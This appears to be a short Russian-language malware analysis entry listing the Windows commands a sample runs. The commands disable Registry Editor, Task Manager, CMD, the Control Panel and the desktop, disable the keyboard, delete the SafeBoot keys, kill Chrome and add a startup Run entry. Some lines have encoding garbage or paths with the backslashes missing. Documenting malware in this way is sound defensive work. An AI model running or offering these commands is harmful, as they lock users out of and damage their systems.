Техническая информация
- Редактора реестра (RegEdit)
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f
- '<SYSTEM32>\wbem\wmiadap.exe' /R /T
- '<SYSTEM32>\rundll32.exe' keyboard,disable
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f
- '<SYSTEM32>\reg.exe' add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f
- '<SYSTEM32>\msg.exe' * └эЄш ╫шЄхЁ
- '<SYSTEM32>\reg.exe' Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\1.bat""
- '<SYSTEM32>\taskkill.exe' /im /f chrome.exe
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- '<SYSTEM32>\reg.exe' Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
- %WINDIR%\Win32.bat
- %TEMP%\1.tmp\1.bat
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'